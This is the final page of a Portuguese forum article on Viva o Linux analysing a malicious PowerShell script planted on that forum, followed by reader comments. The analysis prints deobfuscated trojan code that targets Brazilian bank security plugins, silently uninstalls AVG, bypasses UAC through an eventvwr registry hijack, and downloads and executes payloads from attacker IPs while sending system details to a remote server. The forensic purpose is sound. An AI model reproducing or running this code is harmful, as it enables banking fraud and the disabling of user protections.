Desvendando código malicioso no fórum Viva o Linux

andremilke

Detalhar o procedimento para desvendar o conteúdo do código malicioso no fórum, incluindo passo a passo e parecer das funções do código.

[ Hits: 16.848 ]

Por: ANDRE MILKE DOS SANTOS em 30/11/2016 | Blog: https://br.linkedin.com/in/andremilke

55 0

Denuncie Favoritos Indicar Impressora

Parecer final

Ao analisar o script malicioso exposto, meu parecer foi o seguinte, o código malicioso encontra-se realmente no objeto DEGRADE. Este inclui um log no sistema dizendo para ignorar quaisquer logs posteriores, pois o Windows está em pleno funcionamento.

Windows working normally, ignore this log:

(Windows working normally, ignore this log -join '') >> "$env:APPDATA\$(Microsoft\Windows\Templates\log.txt -join '')"

Após, ele faz uma varredura em todos os programas gbplugin do usuário, em diversos bancos diferentes (por exemplo '001' Banco do Brasil e '104' CEF), efetuando tentativa de desinstalação.

$gbPath = Join-Path $dir (GbPlugin -join '');
		$paths = @{(Join-Path $gbPath gbiehcef.dll) = "104";(Join-Path $gbPath gbiehscd.dll) = "751";(Join-Path $gbPath gbieh.dll) = "001";(Join-Path $gbPath gbiehuni.dll) = "341";(Join-Path ($env:ProgramFiles) "\AppBrad\NetExpress50.exe") = "APP237";(Join-Path ($env:ProgramFiles) Trusteer) = "Trust";(Join-Path ($env:LOCALAPPDATA) "\Aplicativo Itau\itauaplicativo.exe") = "APP341";};
		foreach ($path in $paths.GetEnumerator()) { if(Test-Path $($path.Name) ){ $V1 += $($path.Value) + ","}};
		$avs = (Get-WmiObject -Namespace (root\SecurityCenter2 -join '') -QUERY (SELECT DisplayName FROM AntiVirusProduct -join ''));
		foreach ($av1 in $avs) { $av += $av1.displayName + ","}; 
		if($av -like "*avg*"){
			Start-Process -WindowStyle Hidden powershell.exe -ArgumentList -NoP -NonI -W Hidden -E  $command = 'C:\Windows\System32\cmd.exe /c powershell -NoP -NonI -W Hidden -E "$uninstall32s = gci "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" | foreach { gp $_.PSPath } | ? { $_ -like "*AVG*" } | select UninstallString;
$uninstall64s = gci "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" | foreach { gp $_.PSPath } | ? { $_ -like "*AVG*" } | select UninstallString;

foreach($uninstall64 in $uninstall64s) {
$uninstall64 = $uninstall64.UninstallString -Replace "MsiExec.exe","" -Replace "/I","" -Replace "/X","";
$uninstall64 = $uninstall64.Trim();
if($uninstall64 -like "*Program Files*"){}else{start-process "msiexec.exe" -args "/x $uninstall64  /qn /norestart" -Wait }};
foreach($uninstall32 in $uninstall32s) {
$uninstall32 = $uninstall32.UninstallString -Replace "MsiExec.exe","" -Replace "/I","" -Replace "/X","";
$uninstall32 = $uninstall32.Trim();
if($uninstall32 -like "*Program Files*"){}else{start-process "msiexec.exe" -args "/x $uninstall32  /qn /norestart" -Wait }};"';

Em seguida ele põe o AVG em hibernação e tenta instalar um .cab dele (COF267F9415EF3518C.cab) para o eventviewer e remove algumas chaves no registro do windows. Executa um arquivo, de uma url 130.211.157.13/artw/arquivo e também faz uma requisição http via get para outro link.

if (Test-Path $mscfilePath) {Remove-Item $mscfilePath -Recurse -Force}; -join'' -wait;
			while((get-service -Name (avgwd -join '')).Status -eq (Running -join '')) {Start-Sleep -Seconds 10;}
		}
		$ps = (Get-ChildItem (HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP -join '') -recurse | Get-ItemProperty -name Version,Release -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select Version | Sort-Object Version -Descending)[0].Version;
		if(Test-Path $(Join-Path $dir (WinRAR -join ''))){
			$wr = (.:Winrar-join '')
		}
		if($v1) {
			$durl = "http://130.211.157.13/artw/COF267F9415EF3518C.cab"
			$ll = "COF267F9415EF3518C.cab"
			$output = "$env:APPDATA\$(Microsoft\Windows\Templates\ -join '')" + $ll;
			(New-Object System.Net.WebClient).DownloadFile($durl, $output);
			Start-Process -WindowStyle Hidden  powershell.exe -ArgumentList "-NoP -NonI -W Hidden -E 	$dd = 'COF267F9415EF3518C.cab,C3F5EBEC1';
																										$command = (C:\Windows\System32\cmd.exe /c powershell.exe rundll32 $env:APPDATA\Microsoft\Windows\Templates\ -join '') + $dd;
																										$path = (HKCU:\Software\Classes\mscfile\shell\open\command -join '');
																										if ((Get-ItemProperty -Path $path -Name ((Default) -join '') -ErrorAction SilentlyContinue) -eq $null){	
																										New-Item $path -Force |	 New-ItemProperty -Name ((Default) -join '') -Value $command -PropertyType string -Force | Out-Null }
																										else{exit};
																										$eventvwrPath = Join-Path -Path ([Environment]::GetFolderPath((System -join ''))) -ChildPath (eventvwr.exe -join '');
																										Start-Process -FilePath $eventvwrPath;
																										Start-Sleep -Seconds 5;
																										$mscfilePath = (HKCU:\Software\Classes\mscfile -join ''); 
																										if (Test-Path $mscfilePath) {Remove-Item $mscfilePath -Recurse -Force};
																										";
		}
		$durl = "http://130.211.157.13/artw/arquivo"
		Start-Process -WindowStyle Hidden powershell.exe -ArgumentList "-NoP -NonI -W Hidden iex(New-Object Net.WebClient).DownloadString('$durl')"
		$tudo = (Get-WmiObject -Namespace (root\CIMV2-join '') -QUERY (SELECT * FROM Win32_OperatingSystem -join ''));
		$w = [System.Net.WebRequest]::Create("http://31.220.57.180/frontile/LIMITED/LetsGo.php" + "?A=A&Sytem=" + $tudo.CSName + "::" + $tudo.Caption + ".:" + $tudo.CSDVersion +"("+$tudo.OsArchitecture+")"+ "ps.:" + $ps + $wr + "" +"&qual=" + $V1 + "&ele=" + $av).getResponse();
	}
}

Esta análise possibilitou encontrar diversos IPs que o atacante utilizou e também expos o real interesse do atacante, demonstrando os métodos utilizados e a técnica empregada.

Espero que o artigo seja de valia para os amigos.

Um abraço,
André Milke dos Santos

Página anterior

Páginas do artigo

   1. Converter o ASC II da função em caracteres ANSI
   2. Função para decriptar Base64 em string compactada
   3. Parecer final

Outros artigos deste autor

Aquisição Estática de Dados em Computação Forense

Leitura recomendada

Utilizando hping

Cliente Linux no servidor LDAP

Instalação e configuração do HexChat com a rede Tor

Snort_INLINE: Proteção total

Implementando a segurança em servicos de acesso remoto

Comentários

[1] Comentário enviado por kowalskii em 30/11/2016 - 15:04h

Meus parabéns pela análise e pelo ótimo artigo.
Incrível a infinidade de coisas que um simples script em uma página pode fazer.

8 0

[2] Comentário enviado por andremilke em 30/11/2016 - 16:32h

[1] Comentário enviado por kowalskii em 30/11/2016 - 15:04h

Meus parabéns pela análise e pelo ótimo artigo.
Incrível a infinidade de coisas que um simples script em uma página pode fazer.

Obrigado kowalskii, fico feliz que tenha gostado.

2 0

[3] Comentário enviado por max_lucio em 30/11/2016 - 20:59h

Belo trabalho, parabéns!
Esse script afetaria somente usuário Windows que baixava e executava ?
É usuários no Linux que baixou ?

Obs: Da pra ver que tem mal elemento(cracker) em toda parte, não respeitando o pessoal do software livre que estamos sempre para ajudar a comunidade, e temos que depararmos com essas atitudes querendo manchar o VOL , mais aqui tem pessoas disposta a manter o objetivo de sempre levar informação correta e livre para todos!

6 0

[4] Comentário enviado por removido em 30/11/2016 - 22:09h

Show de bola!

Muito bacana sua análise.

2 0

[5] Comentário enviado por Ghost_Shell em 30/11/2016 - 22:19h

Excelente artigo e dedicação vai para os favoritos.

Keep it simple stupid!

1 0

[6] Comentário enviado por andremilke em 30/11/2016 - 22:57h

[3] Comentário enviado por max_sam em 30/11/2016 - 20:59h

Belo trabalho, parabéns!
Esse script afetaria somente usuário Windows que baixava e executava ?
É usuários no Linux que baixou ?

Obs: Da pra ver que tem mal elemento(cracker) em toda parte, não respeitando o pessoal do software livre que estamos sempre para ajudar a comunidade, e temos que depararmos com essas atitudes querendo manchar o VOL , mais aqui tem pessoas disposta a manter o objetivo de sempre levar informação correta e livre para todos!

Olá, o pessoal tava comentando que existe powershell para Linux também, mas acredito que foi direcionado para usuários windows. Devido a iteração nos logs.

2 0

[7] Comentário enviado por andremilke em 30/11/2016 - 22:58h

[4] Comentário enviado por amarildosertorio em 30/11/2016 - 22:09h

Show de bola!

Muito bacana sua análise.

Obrigado amigo, foi muito bom escreve-lo e compartilhar.

0 0

[8] Comentário enviado por andremilke em 30/11/2016 - 22:59h

[5] Comentário enviado por Ghost_Shell em 30/11/2016 - 22:19h

Excelente artigo e dedicação vai para os favoritos.

Keep it simple stupid!

Valeu Ghost_Shell, deu um trabalho mas que bom que posso compartilhar o resultado e fico grato que gostou.

1 0

[9] Comentário enviado por removido em 01/12/2016 - 01:19h

Legal o artigo. Estava esperando.
Pode-se considerar esse hacking como um tipo de banker?
T+

----------------------------------------------------------------------------------------------------------------
Nem direita, nem esquerda. Quando se trata de corrupção o Brasil é ambidestro.
(anônimo)

Encryption works. Properly implemented strong crypto systems are one of the few things that you can rely on. Unfortunately, endpoint security is so terrifically weak that NSA can frequently find ways around it. — Edward Snowden

1 0

[10] Comentário enviado por Patrick03 em 01/12/2016 - 09:42h

Isso é para mostrar ao raqui que suas ações não ficaram envoltas em mistérios e que terão reações!

---------------------------------------
Corrija-me quando necessário!
https://bartoi.blogspot.com.br/
---------------------------------------

1 0

[11] Comentário enviado por ivaniuni em 01/12/2016 - 10:06h

Excelente trabalho amigo! Na sua opnião o que levou esse hacker a atacar o vol? Esse tipo de ataque geralmente é bem planejado com alvo bem definido! Será que a intenção do hacker era se mostrar para o pessoal daqui? Muitas coisas não fazem sentido! Por que o AVG? e os outros anti-vírus como ficam nessa estória? São muitas perguntas difícieis de responder! Deixar o watts-zap também não faz sentido a não ser que fosse um ransomware e o número fosse para pedir resgate! Parabéns pelo trabalho duro! Obrigado!

3 0

[12] Comentário enviado por hugutux em 01/12/2016 - 12:57h

Show de bola mano, muito Obrigado pelo seu trabalho!

2 0

[13] Comentário enviado por andremilke em 01/12/2016 - 13:39h

[9] Comentário enviado por listeiro_037 em 01/12/2016 - 01:19h

Legal o artigo. Estava esperando.
Pode-se considerar esse hacking como um tipo de banker?
T+

----------------------------------------------------------------------------------------------------------------
Nem direita, nem esquerda. Quando se trata de corrupção o Brasil é ambidestro.
(anônimo)

Encryption works. Properly implemented strong crypto systems are one of the few things that you can rely on. Unfortunately, endpoint security is so terrifically weak that NSA can frequently find ways around it. — Edward Snowden

Acredito que sim, foi essa a intenção

0 0

[14] Comentário enviado por andremilke em 01/12/2016 - 13:43h

Não tenho todas essa repostas, tenho suposições. Houveram outras discussões no forum a respeito, de como ele conseguiu a senha e fez a captura do DNS, talvez ele tenha rodado um script ou feito uma busca em possíveis perfis e encontrou a senha. Talvez tenha sido aleatório.

1 0

[15] Comentário enviado por andremilke em 01/12/2016 - 13:45h

[12] Comentário enviado por hugutux em 01/12/2016 - 12:57h

Show de bola mano, muito Obrigado pelo seu trabalho!

Eu que agradeço, que bom que pude colaborar um pouco com o pessoal.

0 0

[16] Comentário enviado por andremilke em 01/12/2016 - 13:46h

A ideia era tentar entender o que houve, acho que conseguimos.

1 0

[17] Comentário enviado por ctw6av em 01/12/2016 - 21:35h

Belo trabalho, pena que eu não sei nada de java script ou eu ajudaria também.

1 0

[18] Comentário enviado por thiago_c em 01/12/2016 - 21:50h

Ótimo artigo, meus parabéns. Desculpe ser indiscreto mas você trabalha com computação forense?

1 0

[19] Comentário enviado por andremilke em 02/12/2016 - 09:02h

[17] Comentário enviado por ctw6av em 01/12/2016 - 21:35h

Belo trabalho, pena que eu não sei nada de java script ou eu ajudaria também.

Sempre há tempo para aprender amigo, um abraço.

0 0

[20] Comentário enviado por andremilke em 02/12/2016 - 09:04h

[18] Comentário enviado por S4Mu em 01/12/2016 - 21:50h

Ótimo artigo, meus parabéns. Desculpe ser indiscreto mas você trabalha com computação forense?

Olá amigo, não trabalho com computação forense. Só sou um programador interessado na área de segurança da informação, inclusive tô pensando em migrar para essa área, se quiser dar uma olhada no meu linkedin fique a vontade.
https://br.linkedin.com/in/andremilke
Um abraço.

1 0

[21] Comentário enviado por removido em 02/12/2016 - 14:59h

Muito ótimo.
Parabéns de coração.
Muito obrigado por dispor de seu tempo que tenho certeza é muito valioso.
Sempre é bom fazer algo que possa ajudar o próximo.
Eu não sou programador. Cuido de um CPD relativamente simples. Servidores Windows 2008 e Servidores Linux.
No entanto amo estudar (fuçar mesmo) códigos em geral, brincar com eles, hardwares de todos os tipos, Assembly, C, C++, essas coisas.
Depois desse acontecimento, por exemplo, me motivou a conhecer mais o que o java script pode fazer e também, de levada, tudo sobre shellcodes.
Vai ser de muita valia para melhorar minha experiência e quem sabe me ajudar a ter mais segurança onde trabalho.
Um abraço e que bons ventos assoprem sempre para o seu lado.

2 0

[22] Comentário enviado por removido em 02/12/2016 - 15:09h

Eu de novo...
Eu tenho um código mais ou menos do tipo. Era um que ocultava pastas do pendrive e criava atalhos no lugar, assim, toda vez que o usuário clicava na pasta "atalho" abria a pasta original, mas executava o código.
Eu até "destrinchei" uma parte, mas cai e mais códigos e mostra monte de caminhos. Inclusive do registro do Windows.
Não tenho tanto conhecimento para de fato destrinchar por completo de uma maneira mais prática.
Se não se importar, gostaria que pegasse ele, estudasse e destrinchasse. Se é que já não o fez algum dia.
Já encontrei ele. Tem várias funções e um enorme "String.fromCharCode( )".
Se concordar, vou enviar pelo Linux, pois pelo Windows tem que desativar todo o Antivirus, pois já é um conhecido na praça.

1 0

[23] Comentário enviado por andremilke em 04/12/2016 - 14:53h

[21] Comentário enviado por tonyfrasouza em 02/12/2016 - 14:59h

Muito ótimo.
Parabéns de coração.
Muito obrigado por dispor de seu tempo que tenho certeza é muito valioso.
Sempre é bom fazer algo que possa ajudar o próximo.
Eu não sou programador. Cuido de um CPD relativamente simples. Servidores Windows 2008 e Servidores Linux.
No entanto amo estudar (fuçar mesmo) códigos em geral, brincar com eles, hardwares de todos os tipos, Assembly, C, C++, essas coisas.
Depois desse acontecimento, por exemplo, me motivou a conhecer mais o que o java script pode fazer e também, de levada, tudo sobre shellcodes.
Vai ser de muita valia para melhorar minha experiência e quem sabe me ajudar a ter mais segurança onde trabalho.
Um abraço e que bons ventos assoprem sempre para o seu lado.

Que bom, espero que tenha ajudado. Um abraço

1 0

[24] Comentário enviado por andremilke em 04/12/2016 - 14:54h

[22] Comentário enviado por tonyfrasouza em 02/12/2016 - 15:09h

Eu de novo...
Eu tenho um código mais ou menos do tipo. Era um que ocultava pastas do pendrive e criava atalhos no lugar, assim, toda vez que o usuário clicava na pasta "atalho" abria a pasta original, mas executava o código.
Eu até "destrinchei" uma parte, mas cai e mais códigos e mostra monte de caminhos. Inclusive do registro do Windows.
Não tenho tanto conhecimento para de fato destrinchar por completo de uma maneira mais prática.
Se não se importar, gostaria que pegasse ele, estudasse e destrinchasse. Se é que já não o fez algum dia.
Já encontrei ele. Tem várias funções e um enorme "String.fromCharCode( )".
Se concordar, vou enviar pelo Linux, pois pelo Windows tem que desativar todo o Antivirus, pois já é um conhecido na praça.

Pode me enviar, assim que possível dou uma olhada. um abraço

2 0

[25] Comentário enviado por leo4b em 04/12/2016 - 21:32h

Por que ele direciona para o AVG? E se for outro AV?
"while((get-service -Name (avgwd -join '')).Status -eq (Running -join '')) {Start-Sleep -Seconds 10;}"

1 0

[26] Comentário enviado por andremilke em 05/12/2016 - 08:03h

Olá leo4b, ele procura por *AVG*, acredito que seja direcionado apenas para o AVG.

0 0

[27] Comentário enviado por dan108 em 05/12/2016 - 23:38h

Foi pros favoritos aki. Muito bom cara. Quero ser igual a vc quando crescer!!!

2 0

[28] Comentário enviado por andremilke em 06/12/2016 - 08:11h

[27] Comentário enviado por dan108 em 05/12/2016 - 23:38h

Foi pros favoritos aki. Muito bom cara. Quero ser igual a vc quando crescer!!!

Obrigado, que bom que gostou. O aprendizado é continuo, estamos sempre na luta.

0 0

[29] Comentário enviado por Freud_Tux em 06/12/2016 - 12:18h

Caraca!
Eu fico sem aparecer por um tempo, e rola tudo isso :p
Mas brincadeiras a parte...

André (andremilke) parabéns pelo trabalho de análise, ficou show!
E estou favoritando esse seu trabalho, muito bem feito.

T+
______________________________________________________________________

Noob: "[...]Sou muito noob ainda usando o terminal, então preciso de ajuda "mastigada", pra operá-lo."

zhushazang: "Sou velho e meus dentes desgastados. Estude linux www.guiafoca.org";

1 0

[30] Comentário enviado por andremilke em 06/12/2016 - 13:17h

[29] Comentário enviado por Freud Tux em 06/12/2016 - 12:18h

Caraca!
Eu fico sem aparecer por um tempo, e rola tudo isso :p
Mas brincadeiras a parte...

André (andremilke) parabéns pelo trabalho de análise, ficou show!
E estou favoritando esse seu trabalho, muito bem feito.

T+
______________________________________________________________________

Noob: "[...]Sou muito noob ainda usando o terminal, então preciso de ajuda "mastigada", pra operá-lo."

zhushazang: "Sou velho e meus dentes desgastados. Estude linux www.guiafoca.org";

Obrigado Freud, que bom que gostou. Fico feliz de ter colaborado um pouco.

0 0

[31] Comentário enviado por Lisandro em 10/12/2016 - 20:34h

Super legal! Parabéns pelo excelente artigo.

1 0

[32] Comentário enviado por andremilke em 12/12/2016 - 08:10h

[31] Comentário enviado por Lisandro em 10/12/2016 - 20:34h

Super legal! Parabéns pelo excelente artigo.

Obrigado Lisandro, que bom que pude contribuir.

0 0

[33] Comentário enviado por tiago4171 em 13/12/2016 - 15:21h

Caraka mano. Excelente artigo!!!
Favoritado
Não entendo muito dessas coisas, mas será que dá pra identificar o miserável? Tu tem alguns IP's, dá pra denunciar.
Conheço uma galera bacana no Facebook. Caso identifique, me comunique que eu repasso.

EXCELENTE TRABALHO!!! CONTINUE SENDO ESPETACULAR, É DE PESSOAS ASSIM QUE SE VIVE O OPENSOURCE

1 0

[34] Comentário enviado por andremilke em 13/12/2016 - 16:14h

Obrigado tiago4171, o pessoal do site já está tomando as devidas providências.

0 0

[35] Comentário enviado por andrerochatriade em 15/12/2016 - 08:05h

Bom dia,

A principio parabens pelo artigo, que demonstra claramente muito esforço e dedicaçao de sua parte.
"Impressionante"! Esta eh a palavra que resume a horas de analise e experiencia anterior para sua conclusao final.
Obrigado por dispor de seu tempo e compartilhar seus conhecimentos.

"A mente que se abre a uma nova ideia,
jamais retorna ao tamanho original."
(Albert Einstein)

1 0

[36] Comentário enviado por ricardogroetaers em 22/12/2016 - 05:13h

Parabéns pelo trabalho, infelizmente não posso contribuir pois não manjo nada disso.
Só a título de informação, o Symantec Edpoint Protecion (acho que é assim que se escreve) detectou um "win trojan" no arquivo baixado. Eu já joguei o arquivo fora.

1 0

[37] Comentário enviado por andremilke em 04/01/2017 - 08:00h

Obrigado andrerochatriade, muito bom poder contribuir um pouco com o forum. É uma incrível ferramenta de aprendizado, tenho aprendido muito por aqui.

0 0

[38] Comentário enviado por andremilke em 04/01/2017 - 08:01h

Olá ricardogroetaers, obrigado.

0 0

[39] Comentário enviado por MarcosCarraro em 06/01/2017 - 08:46h

Bom Dia André, bela explicação!

Neste caso o atacante se beneficiou do usuário estar permitindo a execução do ActiveX, pois até onde sei é preciso habilitar esta função no IE, e nos demais navegador instalar um plugin, confere?

Já vi muito atacantes fazerem a utilização do Java, para infectar equipamentos, principalmente porque usuários acabam aceitando a execução do applet sem desconfiar, acostumados com o dia a dia de alguns bancos.

Abraços

1 0

[40] Comentário enviado por andremilke em 06/01/2017 - 09:16h

Isso aí MarcosCarraro, obrigado.

0 0

[41] Comentário enviado por andremilke em 29/03/2017 - 09:41h

Olá pessoal,
Criei um script em python, para decriptar Base64 em string compactada. Conforme o passo feito em c#, fiz o mesmo em python.
Abaixo link do github:
https://github.com/andremilke/deflate64

Um abraço,
André Milke

0 0